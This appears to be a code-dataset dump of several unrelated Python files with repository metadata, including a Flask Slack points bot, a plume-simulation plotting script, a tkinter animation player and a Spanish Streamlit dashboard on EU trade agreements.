except ImportError:
from random import SystemRandom
from typing import Sequence
from .otp import OTP
random = SystemRandom()
def generate_secret(
length: int = 16,
chars: Sequence[str] = None
) -> str:
"""
Generates a secret which can be used as secret key
:param length: key length
:param chars: list of characters to be used to generate secret key
:return: secret key string
"""
if chars is None:
chars = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
return ''.join(
random.choice(chars)
for _ in range(length)
)
__all__ = ["generate_secret", "OTP"]
| 0 | 0 | 0 |
6796c13cf7475026c9ef081da79d73b79b3ed231 | 1,777 | py | Python | cases/caseFoamEx/Cases/nEquivalentParticles_06/maxRadialWeightingFactor_04/graphCaseValidation.py | andytorrestb/rarefiedPlume | c09234c701c395d16519d8a361eae17540711530 | [
"MIT"
] | null | null | null | cases/caseFoamEx/Cases/nEquivalentParticles_06/maxRadialWeightingFactor_04/graphCaseValidation.py | andytorrestb/rarefiedPlume | c09234c701c395d16519d8a361eae17540711530 | [
"MIT"
] | null | null | null | cases/caseFoamEx/Cases/nEquivalentParticles_06/maxRadialWeightingFactor_04/graphCaseValidation.py | andytorrestb/rarefiedPlume | c09234c701c395d16519d8a361eae17540711530 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
# Find path for cases
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
# print(curr_dir_path)
# cases = os.listdir(curr_dir_path + '/Cases')
# pop = cases.index('baseCase')
# cases.pop(pop)
# Label graph with bold characters
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
# Read in digitized data
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
print(sim['Ttra_Ar'])
sim = sim[['distance', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 6.02e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 800.0
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['rhoN_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['Ttra_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| 26.522388 | 87 | 0.670793 | import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
# Find path for cases
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
# print(curr_dir_path)
# cases = os.listdir(curr_dir_path + '/Cases')
# pop = cases.index('baseCase')
# cases.pop(pop)
# Label graph with bold characters
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
# Read in digitized data
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
print(sim['Ttra_Ar'])
sim = sim[['distance', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 6.02e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 800.0
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['rhoN_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('DSMC vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('r', fontdict = font_axis_publish)
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'digitized (DAC)')
plt.plot(sim['distance'], sim['Ttra_Ar'], label = 'simulated (DSMC)')
plt.legend()
plt.yscale('log')
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| 0 | 0 | 0 |
6d599e732315b98ff9361f50870da4ee3d6c72bc | 2,935 | py | Python | pointy/__init__.py | AlexLloyd0/pointy-mcpointface | 2c5f3edf14a1d3821933ba8daa3fd616366055a0 | [
"MIT"
] | 1 | 2017-11-22T15:12:39.000Z | 2017-11-22T15:12:39.000Z | pointy/__init__.py | AlexLloyd0/pointy-mcpointface | 2c5f3edf14a1d3821933ba8daa3fd616366055a0 | [
"MIT"
] | 3 | 2017-10-31T22:56:14.000Z | 2017-11-01T21:04:49.000Z | pointy/__init__.py | AlexLloyd0/pointy-mcpointface | 2c5f3edf14a1d3821933ba8daa3fd616366055a0 | [
"MIT"
] | null | null | null | import json
import logging
import os
from flask import Flask, request, jsonify
from pointy.api.add_points import add_points
from pointy.api.add_team import add_team
from pointy.api.add_user import add_user
from pointy.api.get_score import get_score
from pointy.api.get_scoreboard import get_scoreboard, get_scoreboard_page
from pointy.setup_logging import setup_logging
setup_logging()
logger = logging.getLogger(__name__)
app = Flask(__name__)
verify_token = os.environ.get('POINTY_VERIFY_TOKEN')
@app.route('/add-points', methods=['POST'])
@app.route('/get-score', methods=['POST'])
@app.route('/get-scoreboard', methods=['POST'])
@app.route('/add-team', methods=['POST'])
@app.route('/event-endpoint', methods=['POST'])
@app.route('/interactive-endpoint', methods=['POST'])
@app.route('/oauth-redirect', methods=[''])
| 30.257732 | 113 | 0.687223 | import json
import logging
import os
from flask import Flask, request, jsonify
from pointy.api.add_points import add_points
from pointy.api.add_team import add_team
from pointy.api.add_user import add_user
from pointy.api.get_score import get_score
from pointy.api.get_scoreboard import get_scoreboard, get_scoreboard_page
from pointy.setup_logging import setup_logging
setup_logging()
logger = logging.getLogger(__name__)
app = Flask(__name__)
verify_token = os.environ.get('POINTY_VERIFY_TOKEN')
@app.route('/add-points', methods=['POST'])
def add_points_route():
form = request.form
if form.get('token') != verify_token:
return "Incorrect verification token", 403
if form.get('command') != '/points':
return "Invalid command"
return jsonify(add_points(form))
@app.route('/get-score', methods=['POST'])
def get_score_route():
form = request.form
if form.get('token') != verify_token:
return "Incorrect verification token", 403
if form.get('command') != '/score':
return "Invalid command"
return jsonify(get_score(form))
@app.route('/get-scoreboard', methods=['POST'])
def get_scoreboard_route():
form = request.form
if form.get('token') != verify_token:
return "Incorrect verification token", 403
if form.get('command') != '/leaderboard':
return "Invalid command"
return jsonify(get_scoreboard_page(form, offset=0))
@app.route('/add-team', methods=['POST'])
def add_team_route():
form = request.form
if form.get('token') != verify_token:
return "Incorrect verification token", 403
return jsonify(add_team(form))
@app.route('/event-endpoint', methods=['POST'])
def action_route():
form = request.form
# json_ is only for url verification
json_ = request.get_json(silent=True)
if form.get('token') != verify_token and json_.get('token') != verify_token:
return "Incorrect verification token", 403
if form.get('type') == 'team_join':
return jsonify(add_user(form))
if form.get('type') == 'app_uninstalled':
raise NotImplemented('Uninstalled app') # TODO
if json_.get('type') == 'url_verification':
return jsonify({'challenge': json_.get('challenge')})
@app.route('/interactive-endpoint', methods=['POST'])
def interactive_route():
payload = request.form.get('payload', {})
try:
form = json.loads(payload)
except json.decoder.JSONDecodeError:
return "Malformed payload", 400
if form.get('token') != verify_token:
return "Incorrect verification token", 403
if form.get('callback_id') == 'leader_scroll':
return jsonify(get_scoreboard_page(form))
logger.info(str(form))
@app.route('/oauth-redirect', methods=[''])
def oauth_redirect():
pass
def main():
app.run()
# TODO https://blog.heroku.com/how-to-deploy-your-slack-bots-to-heroku#share-your-bot-with-the-heroku-button
| 1,917 | 0 | 177 |
ca40a55c661538e7cdefeeb691b340aad696816b | 232 | py | Python | routines/__init__.py | meteostat/routines | 8867b96a3fcb254ebcc9623933a76dac44157b70 | [
"MIT"
] | 7 | 2020-07-02T09:49:06.000Z | 2021-05-24T11:46:00.000Z | routines/__init__.py | meteostat/routines | 8867b96a3fcb254ebcc9623933a76dac44157b70 | [
"MIT"
] | 16 | 2021-03-29T19:45:01.000Z | 2021-11-14T11:39:12.000Z | routines/__init__.py | meteostat/routines | 8867b96a3fcb254ebcc9623933a76dac44157b70 | [
"MIT"
] | 1 | 2021-04-06T20:58:42.000Z | 2021-04-06T20:58:42.000Z | """
█▀▄▀█ █▀▀ ▀█▀ █▀▀ █▀█ █▀ ▀█▀ ▄▀█ ▀█▀
█░▀░█ ██▄ ░█░ ██▄ █▄█ ▄█ ░█░ █▀█ ░█░
Import & export routines.
The code is licensed under the MIT license.
"""
__appname__ = 'routines'
__version__ = '0.0.1'
from .routine import Routine
| 16.571429 | 43 | 0.482759 | """
█▀▄▀█ █▀▀ ▀█▀ █▀▀ █▀█ █▀ ▀█▀ ▄▀█ ▀█▀
█░▀░█ ██▄ ░█░ ██▄ █▄█ ▄█ ░█░ █▀█ ░█░
Import & export routines.
The code is licensed under the MIT license.
"""
__appname__ = 'routines'
__version__ = '0.0.1'
from .routine import Routine
| 0 | 0 | 0 |
2208401669715ecc10e5a867adce34cacc632295 | 77 | py | Python | rocky.py | Gewery/Pathfinders | 1ced94f3768d829318ec53f5aa8eb57b7a84e9e2 | [
"MIT"
] | null | null | null | rocky.py | Gewery/Pathfinders | 1ced94f3768d829318ec53f5aa8eb57b7a84e9e2 | [
"MIT"
] | null | null | null | rocky.py | Gewery/Pathfinders | 1ced94f3768d829318ec53f5aa8eb57b7a84e9e2 | [
"MIT"
] | 1 | 2018-08-17T12:07:46.000Z | 2018-08-17T12:07:46.000Z | import random
| 15.4 | 32 | 0.662338 | import random
def move(info, ctx=None):
return random.randint(0, 3)
| 37 | 0 | 25 |
2d6b6eb80f38322fca3e11e158d98822aa0f5e99 | 1,678 | py | Python | moove.py | Sanchopanch/matrix | 16289a56688047f623b46de74f7f7f4380006d08 | [
"Apache-2.0"
] | null | null | null | moove.py | Sanchopanch/matrix | 16289a56688047f623b46de74f7f7f4380006d08 | [
"Apache-2.0"
] | null | null | null | moove.py | Sanchopanch/matrix | 16289a56688047f623b46de74f7f7f4380006d08 | [
"Apache-2.0"
] | null | null | null | import pickle
import os
from tkinter import *
import time
if __name__ == "__main__":
fileNameOfJob = 'mov_1.pkl'
if(not os.path.exists( fileNameOfJob)):
pass
with open(fileNameOfJob,'rb') as f:
currMoove =pickle.load(f)
print(' loaded moove with %i cadrs'%len(currMoove))
root = Tk()
canvas = Canvas(root, width=600+3, height=700+3)
canvas.pack()
canvas.create_rectangle(0, 0, 600+2, 700+2, fill="white")
cAlin=[]
cApo=[]
firstCadr =currMoove[0]
for lin in firstCadr.lines:
cA = canvas.create_line(lin[0], lin[1], lin[2], lin[3], fill="#555555", width = lin[4])
cAlin.append(cA)
for po in firstCadr.points:
cA = canvas.create_oval(po[0]-po[2], po[1]-po[2],po[0]+po[2],po[1]+po[2], fill="#FF5555")
cApo.append(cA)
for i,cadr in enumerate(currMoove):
currTime=time.time()
for lin in range( len(cadr.lines)):
if not cadr.lines[lin][5]:
canvas.coords(cAlin[lin], cadr.lines[lin][0], cadr.lines[lin][1], cadr.lines[lin][2], cadr.lines[lin][3])
else:
canvas.coords(cAlin[lin], 0, 0, 0, 1)
for po in range( len(cadr.points)):
large = cadr.points[po][2]
canvas.coords(cApo[po], cadr.points[po][0]-large, cadr.points[po][1]-large,cadr.points[po][0]+large, cadr.points[po][1]+large)
root.update()
time.sleep(1/250)
root.destroy()
| 27.064516 | 139 | 0.54112 | import pickle
import os
from tkinter import *
import time
class moove():
def __init__(self):
self.points = []
self.lines = []
self.pause = 0
if __name__ == "__main__":
fileNameOfJob = 'mov_1.pkl'
if(not os.path.exists( fileNameOfJob)):
pass
with open(fileNameOfJob,'rb') as f:
currMoove =pickle.load(f)
print(' loaded moove with %i cadrs'%len(currMoove))
root = Tk()
canvas = Canvas(root, width=600+3, height=700+3)
canvas.pack()
canvas.create_rectangle(0, 0, 600+2, 700+2, fill="white")
cAlin=[]
cApo=[]
firstCadr =currMoove[0]
for lin in firstCadr.lines:
cA = canvas.create_line(lin[0], lin[1], lin[2], lin[3], fill="#555555", width = lin[4])
cAlin.append(cA)
for po in firstCadr.points:
cA = canvas.create_oval(po[0]-po[2], po[1]-po[2],po[0]+po[2],po[1]+po[2], fill="#FF5555")
cApo.append(cA)
for i,cadr in enumerate(currMoove):
currTime=time.time()
for lin in range( len(cadr.lines)):
if not cadr.lines[lin][5]:
canvas.coords(cAlin[lin], cadr.lines[lin][0], cadr.lines[lin][1], cadr.lines[lin][2], cadr.lines[lin][3])
else:
canvas.coords(cAlin[lin], 0, 0, 0, 1)
for po in range( len(cadr.points)):
large = cadr.points[po][2]
canvas.coords(cApo[po], cadr.points[po][0]-large, cadr.points[po][1]-large,cadr.points[po][0]+large, cadr.points[po][1]+large)
root.update()
time.sleep(1/250)
root.destroy()
| 73 | -7 | 52 |
a4fe50a6a59ef1524c840ac3e8ae35559b6538ac | 9,678 | py | Python | EDA/SRC/dashboard/app.py | PabloEduardoMartinezPicazo/Bootcamp-DataScience-2021 | 0fa5288aec5fb14e3796877882e4f1ddc5ad4aea | [
"MIT"
] | null | null | null | EDA/SRC/dashboard/app.py | PabloEduardoMartinezPicazo/Bootcamp-DataScience-2021 | 0fa5288aec5fb14e3796877882e4f1ddc5ad4aea | [
"MIT"
] | null | null | null | EDA/SRC/dashboard/app.py | PabloEduardoMartinezPicazo/Bootcamp-DataScience-2021 | 0fa5288aec5fb14e3796877882e4f1ddc5ad4aea | [
"MIT"
] | null | null | null | import re
import streamlit as st
import pandas as pd
import numpy as np
import altair as alt
from PIL import Image
import requests
import sys,os
pato = os.path.dirname
direccion=pato(pato(pato(__file__)))
sys.path.append(direccion)
from notebooks.Canada import df_canada
from notebooks.Canada_2 import df_canada1
from notebooks.Japon import df_japon
from notebooks.Japon_2 import df_japon1
from notebooks.Vietnam import df_vietnam
from notebooks.Singapur import df_singapur
from notebooks.Corea import df_corea
from notebooks.Corea_aranceles import df_corea1
from notebooks.paisesfinal import df_paises
from notebooks.Aranceles import aranceles
from SRC.utils_.mining_data_tb import *
from SRC.utils_.visualization_tb import *
df = None
st.set_page_config(layout="wide")
menu = st.sidebar.selectbox('Menu:',
options=["Portada", "Informacion básica", "Casos de estudio", "DataFrames","El datamama","Conclusiones","Información"])
st.title(' La importancia de los acuerdos comerciales internacionales')
if menu == 'Portada':
st.markdown('### En este estudio se pretende refutar la importancia de los acuerdos comerciales internacionales para el comercio de la Unión Europea.')
st.write('¿Los acuerdos comerciales ayudan al comercio de la Unión Europea?: **SI**')
st.markdown ("###### Fuentes: Comisión Europea, Datacomex, Eurostacom, ICEX y Access2Markets.")
st.markdown('### Exportaciones UE - País / Importaciones País - UE')
grafico1 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_exp_total.png')
st.image (grafico1,use_column_width=True)
st.markdown('### Importaciones UE - País')
grafico2 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_totales.png')
st.image (grafico2,use_column_width=True)
st.markdown('### Exportaciones País - UE')
grafico3 = Image.open(direccion + os.sep + 'resources' + os.sep + 'exp_totales.png')
st.image (grafico3,use_column_width=True)
if menu == "Informacion básica":
st.markdown('## Definiciones')
st.write ("1. **Acuerdo libre comercio:** acuerdo firmado por uno o varios países que lo que pretenden es mejorar el comercio entre ambos bloques a través de la eliminación de trabas arancelarias y no arancelarias.")
st.write ("2. **Barreras no arancelarias:** aquellas que impiden el correcto comercio entre dos bloques económicos y que no son de índole arancelario. Entre ellas se encuentras los procedimiento de entrada, los procesos de registro del producto, de inspeccion sanitaria, etc.")
st.write ("3. **Aranceles:** impuestos que se cobran por la entrada de bienes o servicios extranjeros en el mercado nacional de un determinado país.")
st.write ("4. **Existen dos tipos de aranceles:** aplicados como un porcentaje del valor del bien o los que se les aplica un valor fijo por una unidad de medida establecida (por ejemplo una cantidad de toneladas, hectolitros, etc.)")
st.write ("5. **Contingentes:** cantidad exenta de aranceles o a la que se le aplica un arancel menor. A partir de ese volumen los aranceles aumentan.")
st.write ("6. **Clasificación arancelaria:** proceso por el que se asigna a cada mercancía un código numérico basado en ciertos criterios como son la naturaleza del producto o los países de origen y destino.")
st.write ("7. **Taric:** clasificación arancelario usado por la Unión Europea.")
if menu == "Casos de estudio":
submenu=st.sidebar.selectbox(label="País:",
options=["Corea del Sur","Japón","Canadá"])
if submenu=="Corea del Sur":
st.markdown('## El caso coreano: reacción inmediata ')
checkbox_graficas = st.sidebar.checkbox("Gráficas", value=True)
checkbox_correlaciones = st.sidebar.checkbox("Correlaciones", value=True)
if checkbox_graficas:
st.write("Aumento en las exportaciones e importaciones de un **72,26%** y un **105,76%**, respectivamente. ")
st.write ("Reducción de los aranceles: ")
st.write ("- Reduccion mediana de las importaciones del 27% al 5%. ")
st.write ("- Reduccion mediana de las exportaciones del 14% al 0%. ")
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Importaciones de Corea del Sur a la Unión Europea ')
st.plotly_chart(importaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
with col2:
st.markdown('### Exportaciones de Corea del Sur a la Unión Europea ')
st.plotly_chart(exportaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
if checkbox_correlaciones:
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Aranceles 2011 ')
st.plotly_chart(violin_pre(aranceles),use_container_width=True)
with col2:
st.markdown('### Aranceles 2020 ')
st.plotly_chart(violin_post(aranceles),use_container_width=True)
if submenu=="Japón":
st.markdown('## El caso japonés: la larga marcha ')
st.write ("Disminución en las exportaciones de un **-3,35%** y un aumento el **27,72%** de las importaciones.")
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Importaciones de Japón a la Unión Europea ')
st.plotly_chart(importaciones_total(df_japon1,"Japón"),use_container_width=True)
with col2:
st.markdown('### Exportaciones de Japón a la Unión Europea ')
st.plotly_chart(exportaciones_total(df_japon1,"Japón"),use_container_width=True)
if submenu=="Canadá":
st.markdown('## El caso canadiense: con x de mixta')
st.write ("Aumento en las exportaciones e importaciones de un **41,59%** y un **141,80%**, respectivamente.")
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Importaciones de Canadá a la Unión Europea ')
st.plotly_chart(importaciones_total(df_canada1,"Canadá"),use_container_width=False)
with col2:
st.markdown('### Exportaciones de Canadá a la Unión Europea ')
st.plotly_chart(exportaciones_total(df_canada1,"Canadá"),use_container_width=False)
if menu == "DataFrames":
submenu=st.sidebar.selectbox(label="País:",
options=["Canadá","Corea del Sur","Japón","Singapur","Vietnam"])
if submenu=="Canadá":
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Datos antes y despues acuerdo ')
df1 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá1.csv",nrows=20)
st.table(df1)
with col2:
st.markdown('### Datos completos')
df = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá.csv",nrows=20)
st.table(df)
if submenu=="Corea del Sur":
st.markdown('### Datos antes y despues acuerdo ')
df2 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCorea_del_Sur_1.csv",nrows=50)
st.table(df2)
if submenu=="Japón":
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Datos antes y despues acuerdo ')
df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón1.csv",nrows=50)
st.table(df3)
with col2:
st.markdown('### Datos completos')
df4 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón.csv",nrows=50)
st.table(df4)
if submenu=="Singapur":
st.markdown('### Datos completos')
df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioSingapur.csv",nrows=50)
st.table(df3)
if submenu=="Vietnam":
st.markdown('### Datos completos')
df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioVietnam.csv",nrows=50)
st.table(df3)
if menu == "El datamama":
r = requests.get("http://localhost:8080/give_me_id?token_id=R70423563").json()
df = pd.DataFrame(r)
st.write(df)
if menu == "Conclusiones":
st.markdown('## Conclusiones')
st.write ("- Todos los tipos de acuerdos comerciales desde aquellos que son más ambiciosos hasta aquellos que son más conservadores ayudan a mejorar el comercio internacional.")
st.write ("- La correlación entre las exportaciones e importaciones con respecto a los aranceles es inversa.")
st.write ("- A mayor rapidez en la implantacion mayor aumento en el comercio internacional.")
st.write ("- Las barreras arancelarias tienen un peso muy importante en el aumento o disminucion del comercio.")
st.write ("- La comparación entre los países que han adpotado las medidas hace más tiempo y los que las han adoptado hace menos indica que el comercio entre los diferentes bloques se incrementa mucho más tras los acuerdos ")
st.write ("- Las economías con mayor apertura comercial tienden a ser más dependientes del sector exterior que las economias protectoras.")
st.write ("- Importante remarcar que hay una serie de variables no númericas (barreras no arancelarias) que tienen un gran impacto en el comercio, habría que hacer un análisis más profundo.")
if menu == "Información":
st.markdown("### Para más información:")
st.write(" 1. [Linkedin](https://www.linkedin.com/in/pabloeduardomartinezpicazo/)")
st.write(" 2. Correo electónico: pabloeduardo.martinezpicazo@gmail.com")
Imagen_despedida= Image.open(direccion + os.sep + 'resources' + os.sep + 'agradecimiento.jpg')
st.image (Imagen_despedida,use_column_width=True) | 58.301205 | 281 | 0.678859 | import re
import streamlit as st
import pandas as pd
import numpy as np
import altair as alt
from PIL import Image
import requests
import sys,os
pato = os.path.dirname
direccion=pato(pato(pato(__file__)))
sys.path.append(direccion)
from notebooks.Canada import df_canada
from notebooks.Canada_2 import df_canada1
from notebooks.Japon import df_japon
from notebooks.Japon_2 import df_japon1
from notebooks.Vietnam import df_vietnam
from notebooks.Singapur import df_singapur
from notebooks.Corea import df_corea
from notebooks.Corea_aranceles import df_corea1
from notebooks.paisesfinal import df_paises
from notebooks.Aranceles import aranceles
from SRC.utils_.mining_data_tb import *
from SRC.utils_.visualization_tb import *
df = None
st.set_page_config(layout="wide")
menu = st.sidebar.selectbox('Menu:',
options=["Portada", "Informacion básica", "Casos de estudio", "DataFrames","El datamama","Conclusiones","Información"])
st.title(' La importancia de los acuerdos comerciales internacionales')
if menu == 'Portada':
st.markdown('### En este estudio se pretende refutar la importancia de los acuerdos comerciales internacionales para el comercio de la Unión Europea.')
st.write('¿Los acuerdos comerciales ayudan al comercio de la Unión Europea?: **SI**')
st.markdown ("###### Fuentes: Comisión Europea, Datacomex, Eurostacom, ICEX y Access2Markets.")
st.markdown('### Exportaciones UE - País / Importaciones País - UE')
grafico1 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_exp_total.png')
st.image (grafico1,use_column_width=True)
st.markdown('### Importaciones UE - País')
grafico2 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_totales.png')
st.image (grafico2,use_column_width=True)
st.markdown('### Exportaciones País - UE')
grafico3 = Image.open(direccion + os.sep + 'resources' + os.sep + 'exp_totales.png')
st.image (grafico3,use_column_width=True)
if menu == "Informacion básica":
st.markdown('## Definiciones')
st.write ("1. **Acuerdo libre comercio:** acuerdo firmado por uno o varios países que lo que pretenden es mejorar el comercio entre ambos bloques a través de la eliminación de trabas arancelarias y no arancelarias.")
st.write ("2. **Barreras no arancelarias:** aquellas que impiden el correcto comercio entre dos bloques económicos y que no son de índole arancelario. Entre ellas se encuentras los procedimiento de entrada, los procesos de registro del producto, de inspeccion sanitaria, etc.")
st.write ("3. **Aranceles:** impuestos que se cobran por la entrada de bienes o servicios extranjeros en el mercado nacional de un determinado país.")
st.write ("4. **Existen dos tipos de aranceles:** aplicados como un porcentaje del valor del bien o los que se les aplica un valor fijo por una unidad de medida establecida (por ejemplo una cantidad de toneladas, hectolitros, etc.)")
st.write ("5. **Contingentes:** cantidad exenta de aranceles o a la que se le aplica un arancel menor. A partir de ese volumen los aranceles aumentan.")
st.write ("6. **Clasificación arancelaria:** proceso por el que se asigna a cada mercancía un código numérico basado en ciertos criterios como son la naturaleza del producto o los países de origen y destino.")
st.write ("7. **Taric:** clasificación arancelario usado por la Unión Europea.")
if menu == "Casos de estudio":
submenu=st.sidebar.selectbox(label="País:",
options=["Corea del Sur","Japón","Canadá"])
if submenu=="Corea del Sur":
st.markdown('## El caso coreano: reacción inmediata ')
checkbox_graficas = st.sidebar.checkbox("Gráficas", value=True)
checkbox_correlaciones = st.sidebar.checkbox("Correlaciones", value=True)
if checkbox_graficas:
st.write("Aumento en las exportaciones e importaciones de un **72,26%** y un **105,76%**, respectivamente. ")
st.write ("Reducción de los aranceles: ")
st.write ("- Reduccion mediana de las importaciones del 27% al 5%. ")
st.write ("- Reduccion mediana de las exportaciones del 14% al 0%. ")
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Importaciones de Corea del Sur a la Unión Europea ')
st.plotly_chart(importaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
with col2:
st.markdown('### Exportaciones de Corea del Sur a la Unión Europea ')
st.plotly_chart(exportaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
if checkbox_correlaciones:
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Aranceles 2011 ')
st.plotly_chart(violin_pre(aranceles),use_container_width=True)
with col2:
st.markdown('### Aranceles 2020 ')
st.plotly_chart(violin_post(aranceles),use_container_width=True)
if submenu=="Japón":
st.markdown('## El caso japonés: la larga marcha ')
st.write ("Disminución en las exportaciones de un **-3,35%** y un aumento el **27,72%** de las importaciones.")
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Importaciones de Japón a la Unión Europea ')
st.plotly_chart(importaciones_total(df_japon1,"Japón"),use_container_width=True)
with col2:
st.markdown('### Exportaciones de Japón a la Unión Europea ')
st.plotly_chart(exportaciones_total(df_japon1,"Japón"),use_container_width=True)
if submenu=="Canadá":
st.markdown('## El caso canadiense: con x de mixta')
st.write ("Aumento en las exportaciones e importaciones de un **41,59%** y un **141,80%**, respectivamente.")
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Importaciones de Canadá a la Unión Europea ')
st.plotly_chart(importaciones_total(df_canada1,"Canadá"),use_container_width=False)
with col2:
st.markdown('### Exportaciones de Canadá a la Unión Europea ')
st.plotly_chart(exportaciones_total(df_canada1,"Canadá"),use_container_width=False)
if menu == "DataFrames":
submenu=st.sidebar.selectbox(label="País:",
options=["Canadá","Corea del Sur","Japón","Singapur","Vietnam"])
if submenu=="Canadá":
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Datos antes y despues acuerdo ')
df1 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá1.csv",nrows=20)
st.table(df1)
with col2:
st.markdown('### Datos completos')
df = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá.csv",nrows=20)
st.table(df)
if submenu=="Corea del Sur":
st.markdown('### Datos antes y despues acuerdo ')
df2 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCorea_del_Sur_1.csv",nrows=50)
st.table(df2)
if submenu=="Japón":
col1, col2 = st.beta_columns(2)
with col1:
st.markdown('### Datos antes y despues acuerdo ')
df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón1.csv",nrows=50)
st.table(df3)
with col2:
st.markdown('### Datos completos')
df4 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón.csv",nrows=50)
st.table(df4)
if submenu=="Singapur":
st.markdown('### Datos completos')
df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioSingapur.csv",nrows=50)
st.table(df3)
if submenu=="Vietnam":
st.markdown('### Datos completos')
df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioVietnam.csv",nrows=50)
st.table(df3)
if menu == "El datamama":
r = requests.get("http://localhost:8080/give_me_id?token_id=R70423563").json()
df = pd.DataFrame(r)
st.write(df)
if menu == "Conclusiones":
st.markdown('## Conclusiones')
st.write ("- Todos los tipos de acuerdos comerciales desde aquellos que son más ambiciosos hasta aquellos que son más conservadores ayudan a mejorar el comercio internacional.")
st.write ("- La correlación entre las exportaciones e importaciones con respecto a los aranceles es inversa.")
st.write ("- A mayor rapidez en la implantacion mayor aumento en el comercio internacional.")
st.write ("- Las barreras arancelarias tienen un peso muy importante en el aumento o disminucion del comercio.")
st.write ("- La comparación entre los países que han adpotado las medidas hace más tiempo y los que las han adoptado hace menos indica que el comercio entre los diferentes bloques se incrementa mucho más tras los acuerdos ")
st.write ("- Las economías con mayor apertura comercial tienden a ser más dependientes del sector exterior que las economias protectoras.")
st.write ("- Importante remarcar que hay una serie de variables no númericas (barreras no arancelarias) que tienen un gran impacto en el comercio, habría que hacer un análisis más profundo.")
if menu == "Información":
st.markdown("### Para más información:")
st.write(" 1. [Linkedin](https://www.linkedin.com/in/pabloeduardomartinezpicazo/)")
st.write(" 2. Correo electónico: pabloeduardo.martinezpicazo@gmail.com")
Imagen_despedida= Image.open(direccion + os.sep + 'resources' + os.sep + 'agradecimiento.jpg')
